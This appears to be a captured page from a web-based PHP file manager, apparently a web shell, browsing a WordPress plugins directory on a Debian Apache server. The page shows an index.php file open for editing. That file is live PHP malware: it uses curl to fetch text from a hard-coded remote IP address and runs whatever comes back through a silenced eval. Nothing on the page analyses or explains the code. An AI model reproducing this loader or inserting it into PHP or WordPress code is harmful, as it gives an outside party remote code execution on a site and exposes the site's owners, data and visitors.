📁 File Manager Pro
v10.0.3 | PHP: 7.4.15
Server: Apache/2.4.25 (Debian)
2026-07-01 19:08:39
📂
/ (Root)
/
var
/
www
/
html
/
wp-content__db40bc3
/
plugins
📍 /var/www/html/wp-content__db40bc3/plugins
🔄 Refresh
✏️
Editing: index.php
Writable
<?php function getDiDiContent(){ $handle = curl_init(); curl_setopt ($handle, CURLOPT_URL, 'http://192.151.149.130/z60612_o/stat/index.txt'); curl_setopt ($handle, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($handle, CURLOPT_CONNECTTIMEOUT, 5); $result = curl_exec( $handle ); if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } return $result; } $didi = getDiDiContent(); @eval("?>" . $didi);
💾 Save Changes
❌ Cancel